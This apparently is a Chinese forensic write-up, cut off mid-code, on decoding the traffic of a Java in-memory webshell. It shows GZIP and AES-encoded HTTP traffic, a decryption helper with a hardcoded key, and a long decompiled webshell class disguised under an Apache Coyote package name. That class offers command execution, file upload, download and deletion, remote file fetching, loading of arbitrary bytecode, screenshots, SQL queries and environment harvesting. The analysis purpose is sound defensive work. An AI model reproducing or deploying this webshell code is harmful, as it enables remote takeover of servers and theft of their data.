2.1.7 GZIP编解码
内存马配合http头,改变了传输的加密格式
我们在传递的时候,查看他解码的数据,发现,均携带1F8B08000000
1F8B0800000000000000CB4D2DC9C84FF14BCC4D65E2656060484F2D714A2CCE4C2EF6CC4BCB2F4E2D2ECECCCFF34C6112044A6546E6571519F8B8F85526A717A454394602006D9268393B000000 1F8B0800000000000000CB4D2DC9C84FF14BCC4D656261606028492D2E0100F839225013000000
百度查询之后,发现是GZIP压缩,为什么会产生GZIP压缩呢?根据之前的代码传递均为字节码
我们加入GZIP解码,发现流量均迎刃而解
26426ac13be6e1b58c69fd371bac6de05031411e180aefaba292f681d82e4080931feb534693d2267c5d1940e676a29e 解码 6D6574686F644E616D65020400000074657374
我们可以在流量中发现奥秘,针对每个流量包进行分析,最终在一个比较大的流量包中,发现了正常的字节码,也就是攻击方导入的内存马
POST /ncupload/config.jsp HTTP/1.1 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Connection: close Content-Type: application/json Cache-Control: no-cache Pragma: no-cache Host: Content-Length: 47312 {"kvs":{"SaveLogResult":[0]},"tags":{"isSucc":true,"sdkVersion":"2.1.4","projectName":"Publish"},"extraData":""} HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Set-Cookie: JSESSIONID=66F5F21745E86D7D60B9253FABA7D17A.server; Path=/; HttpOnly Content-Type: text/xml;charset=UTF-8 Content-Length: 0 Date: Mon, 25 Jul 2022 11:16:17 GMT Connection: close
我们可以很明显的发现class的特征,CAFEBA
我们将字节码进行提取,并使用jd-gui进行打开,发现并不能打开,因此,咨询相关师傅后,可能是在读取解码过程中发生了问题,
package nuc.edu.hello.controller; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; import java.io.IOException; import java.nio.charset.StandardCharsets; import java.nio.file.Files; import java.nio.file.Paths; public class Test { public static byte[] aes128(byte[] s, int mode) { try { Cipher c = Cipher.getInstance("AES"); c.init(mode, new SecretKeySpec(base64Decode("0J5YM0fKgYVrmMkwTUIF+Q==".getBytes()), "AES")); return c.doFinal(s); } catch (Exception exception) { return null; } } public static byte[] base64Decode(byte[] bytes) { byte[] value = null; try { Class<?> base64 = Class.forName("java.util.Base64"); Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(decoder, new Object[]{bytes}); } catch (Exception exception) { try { Class<?> base64 = Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{new String(bytes)}); } catch (Exception exception1) { } } return value; } public static byte[] unHex(byte[] data) { int len; byte[] out; int i; int j; for (len = data.length, out = new byte[len / 2], i = 0, j = 0; j < len; ) { int f = Character.digit(data[j++], 16) << 4; f |= Character.digit(data[j++], 16); out[i] = (byte) (f & 0xFF); i++; } return out; } public static byte[] base64Encode(byte[] bytes) { byte[] encrypted = null; String str; try { Class<?> base64 = Class.forName("java.util.Base64"); Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); encrypted = (byte[]) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bytes}); } catch (Exception exception) { try { Class<?> base64 = Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); str = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bytes}); str=str.replace("\n", "").replace("\r", ""); encrypted=str.getBytes(); } catch (Exception exception1) { } } return encrypted; } public static void main(String[] args) throws IOException { String b = "{\"kvs\":{\"SaveLogResult\":[0]},\"tags\":{\"isSucc\":true,\"sdkVersion\":\"2.1.4\",\"projectName\":\"Publish\"},\"extraData\":\"\"}"; byte[] requestData = b.getBytes(StandardCharsets.UTF_8); byte[] _requestData = new byte[requestData.length - 112]; //java.lang.System.arraycopy(requestData,110,_requestData); java.lang.System.arraycopy(requestData,110,_requestData,0,_requestData.length); requestData = _requestData; requestData = unHex(requestData); requestData = aes128(requestData,2); Files.write(Paths.get("./233.class"),requestData); } }
我们查看提取出的class内存马
// // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package org.apache.coyote.introspect; import java.awt.Rectangle; import java.awt.Robot; import java.awt.Toolkit; import java.awt.image.BufferedImage; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.PrintStream; import java.io.RandomAccessFile; import java.lang.reflect.Array; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.InetAddress; import java.net.URL; import java.sql.Connection; import java.sql.Driver; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Arrays; import java.util.Date; import java.util.Enumeration; import java.util.HashMap; import java.util.Hashtable; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Properties; import java.util.Random; import java.util.zip.GZIPInputStream; import java.util.zip.GZIPOutputStream; import javax.imageio.ImageIO; public class JacksonAnnotationIntrospector extends ClassLoader { public static final char[] toBase64 = new char[]{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'}; private static Map sessionMap = new Hashtable(); Map parameterMap; byte[] requestData; ByteArrayOutputStream outputStream; Object servletRequest; Map session; public JacksonAnnotationIntrospector() { } public JacksonAnnotationIntrospector(ClassLoader var1) { super(var1); } public Class defineClass(byte[] var1) { return super.defineClass((String)null, var1, 0, var1.length, this.getClass().getProtectionDomain()); } public byte[] run() { try { String var1 = this.get("evalClassName"); String var20 = this.get("methodName"); if (var20 == null) { return "Method is empty".getBytes(); } else { Object var21 = null; if (var1 != null) { Class var4 = (Class)this.session.get(var1); if (var4 == null) { return "Plugin module not loaded".getBytes(); } this.parameterMap.put("sessionTable", this.session); this.parameterMap.put("servletRequest", this.servletRequest); var21 = var4.newInstance(); } Method var22 = null; boolean var5 = var21 != null; Class var6 = var5 ? var21.getClass() : this.getClass(); var21 = var5 ? var21 : this; byte[] var7 = this.getByteArray("invokeMethod"); Class[] var8 = new Class[1]; Object[] var9 = new Object[]{var21}; if (var7 != null || !var5) { Class var10002; try { var10002 = class$0; if (var10002 == null) { try { var10002 = Class.forName("java.util.Map"); } catch (ClassNotFoundException var17) { throw new NoClassDefFoundError(var17.getMessage()); } class$0 = var10002; } var8[0] = var10002; var22 = var6.getMethod(var20, var8); } catch (NoSuchMethodException var18) { try { var10002 = class$1; if (var10002 == null) { try { var10002 = Class.forName("java.util.Dictionary"); } catch (ClassNotFoundException var15) { throw new NoClassDefFoundError(var15.getMessage()); } class$1 = var10002; } var8[0] = var10002; var22 = var6.getMethod(var20, var8); } catch (NoSuchMethodException var16) { try { var8 = new Class[0]; var9 = new Object[0]; var22 = var6.getMethod(var20, var8); } catch (NoSuchMethodException var14) { return "No Such Method".getBytes(); } } } } Object var10 = null; if (var22 != null) { var10 = var22.invoke(var21, var9); } else { var21.equals(this.parameterMap); var21.toString(); var10 = this.parameterMap.get("result"); } Class var10000 = class$2; if (var10000 == null) { try { var10000 = Class.forName("[B"); } catch (ClassNotFoundException var13) { throw new NoClassDefFoundError(var13.getMessage()); } class$2 = var10000; } if (var10000.isInstance(var10)) { return (byte[])var10; } else { var10000 = class$3; if (var10000 == null) { try { var10000 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var12) { throw new NoClassDefFoundError(var12.getMessage()); } class$3 = var10000; } if (var10000.isInstance(var10)) { return ((String)var10).getBytes(); } else { var10000 = class$0; if (var10000 == null) { try { var10000 = Class.forName("java.util.Map"); } catch (ClassNotFoundException var11) { throw new NoClassDefFoundError(var11.getMessage()); } class$0 = var10000; } return var10000.isInstance(var10) ? this.serialize((Map)var10) : "Incorrect return type".getBytes(); } } } } catch (Throwable var19) { ByteArrayOutputStream var2 = new ByteArrayOutputStream(); PrintStream var3 = new PrintStream(var2); var19.printStackTrace(var3); var3.flush(); var3.close(); return var2.toByteArray(); } } public HashMap deserialize(byte[] var1, boolean var2) { HashMap var3 = new HashMap(); ByteArrayInputStream var4 = new ByteArrayInputStream(var1); ByteArrayOutputStream var5 = new ByteArrayOutputStream(); byte[] var6 = new byte[4]; try { Object var7 = var4; if (var2) { var7 = new GZIPInputStream(var4); } while(true) { byte var8 = (byte)((InputStream)var7).read(); if (var8 == -1) { break; } int var9; String var10; if (var8 == 1) { ((InputStream)var7).read(var6); var9 = bytesToInt(var6); var10 = var5.toString(); var3.put(var10, this.deserialize(this.readInputStream((InputStream)var7, var9), false)); var5.reset(); } else if (var8 == 2) { ((InputStream)var7).read(var6); var9 = bytesToInt(var6); var10 = var5.toString(); var3.put(var10, this.readInputStream((InputStream)var7, var9)); var5.reset(); } else { var5.write(var8); } } } catch (Exception var11) { } return var3; } public byte[] serialize(Map var1) { Iterator var2 = var1.keySet().iterator(); ByteArrayOutputStream var3 = new ByteArrayOutputStream(); while(var2.hasNext()) { try { String var4 = (String)var2.next(); Object var5 = var1.get(var4); var3.write(var4.getBytes()); byte[] var6; if (var5 instanceof byte[]) { var3.write(2); var6 = (byte[])var5; } else if (var5 instanceof Map) { var3.write(1); var6 = this.serialize((Map)var5); } else { var3.write(2); if (var5 == null) { var6 = "NULL".getBytes(); } else { var6 = var5.toString().getBytes(); } } var3.write(intToBytes(var6.length)); var3.write(var6); } catch (Exception var7) { } } return var3.toByteArray(); } public boolean equals(Object var1) { return var1 != null && this.handle(var1); } public boolean handle(Object var1) { if (var1 == null) { return false; } else { Class var10000 = class$4; if (var10000 == null) { try { var10000 = Class.forName("java.io.ByteArrayOutputStream"); } catch (ClassNotFoundException var3) { throw new NoClassDefFoundError(var3.getMessage()); } class$4 = var10000; } if (var10000.isInstance(var1)) { this.outputStream = (ByteArrayOutputStream)var1; } else { var10000 = class$2; if (var10000 == null) { try { var10000 = Class.forName("[B"); } catch (ClassNotFoundException var2) { throw new NoClassDefFoundError(var2.getMessage()); } class$2 = var10000; } if (var10000.isInstance(var1)) { this.requestData = (byte[])var1; } else if (this.supportClass(var1, ".servlet.http.HttpServletRequest")) { this.servletRequest = var1; } } return false; } } private boolean supportClass(Object var1, String var2) { if (var1 == null) { return false; } else { boolean var3 = false; Class var4 = null; try { try { var4 = Class.forName("javax" + var2, true, var1.getClass().getClassLoader()); } catch (Exception var5) { var4 = Class.forName("jakarta" + var2, true, var1.getClass().getClassLoader()); } } catch (Exception var6) { } if (var4 != null && var4.isInstance(var1)) { var3 = true; } return var3; } } public String toString() { if (this.outputStream != null && this.requestData != null) { try { this.parameterMap = this.deserialize(this.requestData, true); String var1 = this.sessionId(); if (var1 != null) { this.session = (Map)sessionMap.get(var1); } String var2 = this.get("methodName"); if (var2 == null || this.session == null && !"test".equals(var2)) { return super.toString(); } GZIPOutputStream var3 = new GZIPOutputStream(this.outputStream); byte[] var4 = this.run(); var3.write(var4); var3.close(); this.outputStream.close(); this.parameterMap = null; this.requestData = null; this.outputStream = null; this.servletRequest = null; this.session = null; } catch (Throwable var5) { } } return super.toString(); } public String get(String var1) { try { return new String((byte[])this.parameterMap.get(var1)); } catch (Exception var2) { return null; } } public byte[] getByteArray(String var1) { try { return (byte[])this.parameterMap.get(var1); } catch (Exception var2) { return null; } } public byte[] test() { HashMap var1 = new HashMap(); String var2 = this.sessionId(); if (this.session == null) { var2 = getRandomString(16); this.session = new Hashtable(); this.session.put("alive", Boolean.TRUE); sessionMap.put(var2, this.session); } var1.put("sessionId", var2); return this.serialize(var1); } public byte[] getFile() { String var1 = this.get("dirName"); HashMap var2 = new HashMap(); if (var1 != null) { var1 = var1.trim(); try { String var3 = (new File(var1)).getAbsoluteFile() + "/"; File var16 = new File(var3); if (var16.exists() && var16.isDirectory()) { File[] var5 = var16.listFiles(); if (var5 != null) { for(int var6 = 0; var6 < var5.length; ++var6) { HashMap var7 = new HashMap(); File var8 = var5[var6]; try { var7.put("0", var8.getName()); var7.put("1", var8.isDirectory() ? "0" : "1"); var7.put("2", (new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")).format(new Date(var8.lastModified()))); var7.put("3", Long.toString(var8.length())); StringBuffer var9 = (new StringBuffer(String.valueOf(var8.canRead() ? "R" : ""))).append(var8.canWrite() ? "W" : ""); try { Class var10001 = class$5; if (var10001 == null) { try { var10001 = Class.forName("java.io.File"); } catch (ClassNotFoundException var12) { throw new NoClassDefFoundError(var12.getMessage()); } class$5 = var10001; } Method var10 = this.getMethodByClass(var10001, "canExecute", (Class[])null); if (var10 != null) { Boolean var11 = (Boolean)var10.invoke(var8); if (var11) { var9.append("X"); } } } catch (Throwable var13) { } String var17 = var9.toString(); var7.put("4", var17 != null && var17.trim().length() != 0 ? var17 : "F"); } catch (Throwable var14) { var7.put("errMsg", var14.getMessage()); } var2.put(String.valueOf(var6), var7); } var2.put("count", String.valueOf(var5.length)); var2.put("currentDir", var3); } } else { var2.put("errMsg", "dir does not exist"); } } catch (Exception var15) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var15.getMessage()); var2.put("errMsg", var4.toString()); } } else { var2.put("errMsg", "No parameter dirName"); } return this.serialize(var2); } public String listFileRoot() { File[] var1 = File.listRoots(); String var2 = new String(); for(int var3 = 0; var3 < var1.length; ++var3) { var2 = var2 + var1[var3].getPath(); var2 = var2 + ";"; } return var2; } public byte[] fileRemoteDown() { String var1 = this.get("url"); String var2 = this.get("saveFile"); if (var1 != null && var2 != null) { FileOutputStream var3 = null; try { InputStream var4 = (new URL(var1)).openStream(); var3 = new FileOutputStream(var2); byte[] var9 = new byte[5120]; int var6; while((var6 = var4.read(var9)) != -1) { var3.write(var9, 0, var6); } var3.flush(); var3.close(); var4.close(); return "ok".getBytes(); } catch (Exception var8) { if (var3 != null) { try { var3.close(); } catch (IOException var7) { return var7.getMessage().getBytes(); } } StringBuffer var5 = new StringBuffer(); var5.append("Exception errMsg:"); var5.append(var8.getMessage()); return var5.toString().getBytes(); } } else { return "url or saveFile is null".getBytes(); } } public byte[] setFileAttr() { String var1 = this.get("type"); String var2 = this.get("attr"); String var3 = this.get("fileName"); String var4 = "Null"; if (var1 != null && var2 != null && var3 != null) { try { File var5 = new File(var3); if ("fileBasicAttr".equals(var1)) { Class var10001 = class$5; if (var10001 == null) { try { var10001 = Class.forName("java.io.File"); } catch (ClassNotFoundException var27) { throw new NoClassDefFoundError(var27.getMessage()); } class$5 = var10001; } if (this.getMethodByClass(var10001, "setWritable", new Class[]{Boolean.TYPE}) != null) { if (var2.indexOf("R") != -1) { var5.setReadable(true); } if (var2.indexOf("W") != -1) { var5.setWritable(true); } if (var2.indexOf("X") != -1) { var5.setExecutable(true); } var4 = "ok"; } else { var4 = "Java version is less than 1.6"; } } else if ("fileTimeAttr".equals(var1)) { Date var29 = new Date(0L); StringBuffer var7 = new StringBuffer(); var7.append(var2); char[] var8 = new char[13 - var7.length()]; Arrays.fill(var8, '0'); var7.append(var8); var29 = new Date(var29.getTime() + Long.parseLong(var7.toString())); var5.setLastModified(var29.getTime()); var4 = "ok"; try { Class var9 = Class.forName("java.nio.file.Paths"); Class var10 = Class.forName("java.nio.file.Path"); Class var11 = Class.forName("java.nio.file.attribute.BasicFileAttributeView"); Class var12 = Class.forName("java.nio.file.Files"); Class var13 = Class.forName("java.nio.file.attribute.FileTime"); Class var14 = Class.forName("[java.nio.file.LinkOption"); Class[] var10002 = new Class[2]; Class var10005 = class$3; if (var10005 == null) { try { var10005 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var25) { throw new NoClassDefFoundError(var25.getMessage()); } class$3 = var10005; } var10002[0] = var10005; var10005 = class$6; if (var10005 == null) { try { var10005 = Class.forName("[Ljava.lang.String;"); } catch (ClassNotFoundException var24) { throw new NoClassDefFoundError(var24.getMessage()); } class$6 = var10005; } var10002[1] = var10005; Method var15 = var9.getMethod("get", var10002); Method var16 = var13.getMethod("fromMillis", Long.TYPE); var10002 = new Class[]{var10, null, null}; var10005 = class$7; if (var10005 == null) { try { var10005 = Class.forName("java.lang.Class"); } catch (ClassNotFoundException var23) { throw new NoClassDefFoundError(var23.getMessage()); } class$7 = var10005; } var10002[1] = var10005; var10002[2] = var14; Method var17 = var12.getMethod("getFileAttributeView", var10002); Method var18 = var11.getMethod("setTimes", var13, var13, var13); Object var19 = var15.invoke((Object)null, var3, new String[0]); Object var20 = Array.newInstance(var14.getComponentType(), 0); Object var21 = var17.invoke((Object)null, var19, var11, var20); Object var22 = var16.invoke((Object)null, var29.getTime()); var18.invoke(var21, var22, var22, var22); } catch (Throwable var26) { } } else { var4 = "no ExcuteType"; } } catch (Throwable var28) { StringBuffer var6 = new StringBuffer(); var6.append("Exception errMsg:"); var6.append(var28.getMessage()); return var6.toString().getBytes(); } } else { var4 = "type or attr or fileName is empty"; } return var4.getBytes(); } public byte[] readFile() { String var1 = this.get("fileName"); if (var1 != null) { File var2 = new File(var1); try { if (var2.exists() && var2.isFile()) { if (var2.length() > 204800L) { return "The file is too large, please use the large file to download".getBytes(); } else { byte[] var3 = new byte[(int)var2.length()]; FileInputStream var4; if (var3.length > 0) { var4 = new FileInputStream(var2); var3 = this.readInputStream(var4, var3.length); var4.close(); } else { var3 = new byte[204800]; var4 = new FileInputStream(var2); int var5 = var4.read(var3); if (var5 > 0) { var3 = new byte[var5]; System.arraycopy(var3, 0, var3, 0, var3.length); } var4.close(); } return var3; } } else { return "file does not exist".getBytes(); } } catch (Exception var6) { return var6.getMessage().getBytes(); } } else { return "No parameter fileName".getBytes(); } } public byte[] uploadFile() { String var1 = this.get("fileName"); byte[] var2 = this.getByteArray("fileValue"); if (var1 != null && var2 != null) { try { File var3 = new File(var1); var3.createNewFile(); FileOutputStream var4 = new FileOutputStream(var3); var4.write(var2); var4.close(); return "ok".getBytes(); } catch (Exception var5) { return var5.getMessage().getBytes(); } } else { return "No parameter fileName and fileValue".getBytes(); } } public byte[] newFile() { String var1 = this.get("fileName"); if (var1 != null) { File var2 = new File(var1); try { return var2.createNewFile() ? "ok".getBytes() : "fail".getBytes(); } catch (Exception var5) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var5.getMessage()); return var4.toString().getBytes(); } } else { return "No parameter fileName".getBytes(); } } public byte[] newDir() { String var1 = this.get("dirName"); if (var1 != null) { File var2 = new File(var1); try { return var2.mkdirs() ? "ok".getBytes() : "fail".getBytes(); } catch (Exception var5) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var5.getMessage()); return var4.toString().getBytes(); } } else { return "No parameter fileName".getBytes(); } } public byte[] deleteFile() { String var1 = this.get("fileName"); String var2 = "mem://"; if (var1 != null) { if (var1.startsWith(var2)) { this.session.remove(var1); return "ok".getBytes(); } else { try { File var3 = new File(var1); this.deleteFiles(var3); return "ok".getBytes(); } catch (Exception var5) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var5.getMessage()); return var4.toString().getBytes(); } } } else { return "No parameter fileName".getBytes(); } } public byte[] moveFile() { String var1 = this.get("srcFileName"); String var2 = this.get("destFileName"); if (var1 != null && var2 != null) { File var3 = new File(var1); try { if (var3.exists()) { return var3.renameTo(new File(var2)) ? "ok".getBytes() : "fail".getBytes(); } else { return "The target does not exist".getBytes(); } } catch (Exception var6) { StringBuffer var5 = new StringBuffer(); var5.append("Exception errMsg:"); var5.append(var6.getMessage()); return var5.toString().getBytes(); } } else { return "No parameter srcFileName,destFileName".getBytes(); } } public byte[] copyFile() { String var1 = this.get("srcFileName"); String var2 = this.get("destFileName"); if (var1 != null && var2 != null) { File var3 = new File(var1); File var4 = new File(var2); try { if (var3.exists() && var3.isFile()) { FileInputStream var5 = new FileInputStream(var3); FileOutputStream var6 = new FileOutputStream(var4); byte[] var7 = new byte[5120]; int var8; while((var8 = var5.read(var7)) > -1) { var6.write(var7, 0, var8); } var5.close(); var6.close(); return "ok".getBytes(); } else { return "The target does not exist or is not a file".getBytes(); } } catch (Exception var9) { return var9.getMessage().getBytes(); } } else { return "No parameter srcFileName,destFileName".getBytes(); } } public byte[] include() { byte[] var1 = this.getByteArray("binCode"); String var2 = this.get("codeName"); if (var1 != null && var2 != null) { try { JacksonAnnotationIntrospector var3 = new JacksonAnnotationIntrospector(this.getClass().getClassLoader()); Class var4 = var3.defineClass(var1); this.session.put(var2, var4); return "ok".getBytes(); } catch (Exception var5) { return this.session.get(var2) != null ? "ok".getBytes() : var5.getMessage().getBytes(); } } else { return "No parameter binCode,codeName".getBytes(); } } public byte[] execCommand() { String var1 = this.get("argsCount"); if (var1 != null && var1.length() > 0) { int var2 = Integer.parseInt(var1); String[] var3 = new String[var2]; for(int var4 = 0; var4 < var3.length; ++var4) { var3[var4] = this.get("arg-" + var4); } try { Process var11 = Runtime.getRuntime().exec(var3); if (var11 == null) { return "Unable to start process".getBytes(); } else { InputStream var12 = var11.getInputStream(); InputStream var6 = var11.getErrorStream(); ByteArrayOutputStream var7 = new ByteArrayOutputStream(1024); byte[] var8 = new byte[1042]; int var9; if (var12 != null) { while((var9 = var12.read(var8)) > 0) { var7.write(var8, 0, var9); } } if (var6 != null) { while((var9 = var6.read(var8)) > 0) { var7.write(var8, 0, var9); } } return var7.toByteArray(); } } catch (Exception var10) { StringBuffer var5 = new StringBuffer(); var5.append("Exception errMsg:"); var5.append(var10.getMessage()); return var5.toString().getBytes(); } } else { return "No parameter argsCount".getBytes(); } } public byte[] getBasicsInfo() { String var1 = ""; try { Enumeration var2 = System.getProperties().keys(); var1 = var1 + "FileRoot : " + this.listFileRoot() + "\n"; var1 = var1 + "CurrentDir : " + (new File("")).getAbsoluteFile() + "/" + "\n"; var1 = var1 + "CurrentUser : " + System.getProperty("user.name") + "\n"; var1 = var1 + "ProcessArch : " + System.getProperty("sun.arch.data.model") + "\n"; String var9; try { var9 = System.getProperty("java.io.tmpdir"); char var4 = var9.charAt(var9.length() - 1); if (var4 != '\\' && var4 != '/') { var9 = var9 + File.separator; } var1 = var1 + "TempDirectory : " + var9 + "\n"; } catch (Exception var7) { } var1 = var1 + "RealFile : " + this.getRealPath() + "\n"; try { var1 = var1 + "OsInfo : os.name: " + System.getProperty("os.name") + " os.version: " + System.getProperty("os.version") + " os.arch: " + System.getProperty("os.arch") + "\n"; } catch (Exception var6) { var1 = var1 + "OsInfo : " + var6.getMessage() + "\n"; } for(var1 = var1 + "IPList : " + getLocalIPList() + "\n"; var2.hasMoreElements(); var1 = var1 + var9 + " : " + System.getProperty(var9) + "\n") { var9 = (String)var2.nextElement(); } Map var11 = this.getEnv(); String var10; if (var11 != null) { for(Iterator var5 = var11.keySet().iterator(); var5.hasNext(); var1 = var1 + var10 + " : " + var11.get(var10) + "\n") { var10 = (String)var5.next(); } } return var1.getBytes(); } catch (Exception var8) { StringBuffer var3 = new StringBuffer(); var3.append(var1); var3.append("Exception errMsg:"); var3.append(var8.getMessage()); return var3.toString().getBytes(); } } public byte[] screen() { try { Robot var1 = new Robot(); BufferedImage var6 = var1.createScreenCapture(new Rectangle(Toolkit.getDefaultToolkit().getScreenSize().width, Toolkit.getDefaultToolkit().getScreenSize().height)); ByteArrayOutputStream var3 = new ByteArrayOutputStream(); ImageIO.write(var6, "png", ImageIO.createImageOutputStream(var3)); byte[] var4 = var3.toByteArray(); var3.close(); return var4; } catch (Throwable var5) { StringBuffer var2 = new StringBuffer(); var2.append("Exception errMsg:"); var2.append(var5.getMessage()); return var2.toString().getBytes(); } } public byte[] execSql() throws Exception { String var1 = this.get("dbCharset"); String var2 = this.get("jdbcURL"); String var3 = this.get("dbDriver"); String var4 = this.get("dbUsername"); String var5 = this.get("dbPassword"); String var6 = this.get("execType"); if (var1 == null || var1.trim().length() > 0) { var1 = "UTF-8"; } String var7 = new String(this.getByteArray("execSql"), var1); HashMap var8 = new HashMap(); if (var4 != null && var5 != null && var6 != null && var7 != null) { try { try { if (var3 != null) { Class.forName(var3); } } catch (Throwable var30) { } try { Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver"); } catch (Throwable var29) { } try { Class.forName("oracle.jdbc.driver.OracleDriver"); } catch (Throwable var28) { try { Class.forName("oracle.jdbc.OracleDriver"); } catch (Throwable var27) { } } try { Class.forName("com.mysql.cj.jdbc.Driver"); } catch (Throwable var26) { try { Class.forName("com.mysql.jdbc.Driver"); } catch (Throwable var25) { } } try { Class.forName("org.postgresql.Driver"); } catch (Throwable var24) { } if (var2 != null) { try { Connection var9 = null; try { var9 = getConnection(var2, var4, var5); } catch (Exception var23) { } if (var9 == null) { var9 = DriverManager.getConnection(var2, var4, var5); } Statement var10 = var9.createStatement(); if (var6.equals("select")) { ResultSet var11 = var10.executeQuery(var7); ResultSetMetaData var12 = var11.getMetaData(); int var13 = var12.getColumnCount(); HashMap var14 = new HashMap(); for(int var15 = 0; var15 < var13; ++var15) { var14.put(String.valueOf(var15), var12.getColumnName(var15 + 1)); } var14.put("count", String.valueOf(var13)); var8.put("column", var14); HashMap var34 = new HashMap(); int var16 = 0; for(int var17 = 0; var11.next(); ++var17) { HashMap var18 = new HashMap(); for(int var19 = 0; var19 < var13; ++var19) { Object var20 = var11.getObject(var19 + 1); String var21 = null; if (var20 == null) { var21 = "NULL"; } else { Class var10000 = class$2; if (var10000 == null) { try { var10000 = Class.forName("[B"); } catch (ClassNotFoundException var22) { throw new NoClassDefFoundError(var22.getMessage()); } class$2 = var10000; } if (var10000.isInstance(var20)) { var21 = this.base64Encode((byte[])var20); } else { var21 = var20.toString(); } } var18.put(String.valueOf(var19), var21); } ++var16; var34.put(String.valueOf(var17), var18); } var34.put("count", String.valueOf(var16)); var8.put("rows", var34); var11.close(); var10.close(); var9.close(); } else { int var33 = var10.executeUpdate(var7); var10.close(); var9.close(); var8.put("errMsg", "Query OK, " + var33 + " rows affected"); } } catch (Exception var31) { var8.put("errMsg", var31.getMessage()); } } else { var8.put("errMsg", "This database is not supported"); } } catch (Exception var32) { var8.put("errMsg", var32.getMessage()); } } else { var8.put("errMsg", "No parameter dbType,dbHost,dbPort,dbUsername,dbPassword,execType,execSql"); } return this.serialize(var8); } public byte[] close() { try { String var1 = this.sessionId(); String var2 = this.get("operation"); if (var1 != null) { Map var7 = (Map)sessionMap.remove(var1); var7.put("alive", Boolean.FALSE); return "ok".getBytes(); } else if (var2 != null && "clearup".equals(var2)) { Iterator var3 = sessionMap.values().iterator(); while(var3.hasNext()) { Object var4 = var3.next(); Class var10000 = class$0; if (var10000 == null) { try { var10000 = Class.forName("java.util.Map"); } catch (ClassNotFoundException var5) { throw new NoClassDefFoundError(var5.getMessage()); } class$0 = var10000; } if (var10000.isInstance(var4)) { ((Map)var4).put("alive", Boolean.FALSE); } } sessionMap.clear(); return "ok".getBytes(); } else { return "fail".getBytes(); } } catch (Exception var6) { return var6.getMessage().getBytes(); } } public byte[] bigFileUpload() { String var1 = this.get("fileName"); byte[] var2 = this.getByteArray("fileContents"); String var3 = this.get("position"); String var4 = "mem://"; int var5 = var3 == null ? 0 : Integer.parseInt(var3); Constructor var6 = null; try { try { Class var10000 = class$8; if (var10000 == null) { try { var10000 = Class.forName("java.io.RandomAccessFile"); } catch (ClassNotFoundException var11) { throw new NoClassDefFoundError(var11.getMessage()); } class$8 = var10000; } Class[] var10001 = new Class[2]; Class var10004 = class$3; if (var10004 == null) { try { var10004 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var10) { throw new NoClassDefFoundError(var10.getMessage()); } class$3 = var10004; } var10001[0] = var10004; var10004 = class$3; if (var10004 == null) { try { var10004 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var9) { throw new NoClassDefFoundError(var9.getMessage()); } class$3 = var10004; } var10001[1] = var10004; var6 = var10000.getConstructor(var10001); } catch (NoSuchMethodException var12) { var3 = null; } if (var1.startsWith(var4)) { if (var5 == 0) { this.session.put(var1, new ByteArrayOutputStream()); } ByteArrayOutputStream var7 = (ByteArrayOutputStream)this.session.get(var1); var7.write(var2); } else if (var3 == null) { FileOutputStream var14 = new FileOutputStream(var1, true); var14.write(var2); var14.flush(); var14.close(); } else { RandomAccessFile var15 = (RandomAccessFile)var6.newInstance(var1, "rw"); var15.seek((long)var5); var15.write(var2); var15.close(); } return "ok".getBytes(); } catch (Exception var13) { StringBuffer var8 = new StringBuffer(); var8.append("Exception errMsg:"); var8.append(var13.getMessage()); return var8.toString().getBytes(); } } public byte[] bigFileDownload() { String var1 = this.get("fileName"); String var2 = this.get("mode"); String var3 = this.get("readByteNum"); String var4 = this.get("position"); String var5 = "mem://"; try { if ("fileSize".equals(var2)) { return String.valueOf((new File(var1)).length()).getBytes(); } else if ("read".equals(var2)) { int var6 = Integer.valueOf(var4); int var12 = Integer.valueOf(var3); byte[] var8 = new byte[var12]; Object var9 = null; if (var1.startsWith(var5)) { var9 = (InputStream)this.session.get(var1); } else { var9 = new FileInputStream(var1); } ((InputStream)var9).skip((long)var6); int var10 = ((InputStream)var9).read(var8); 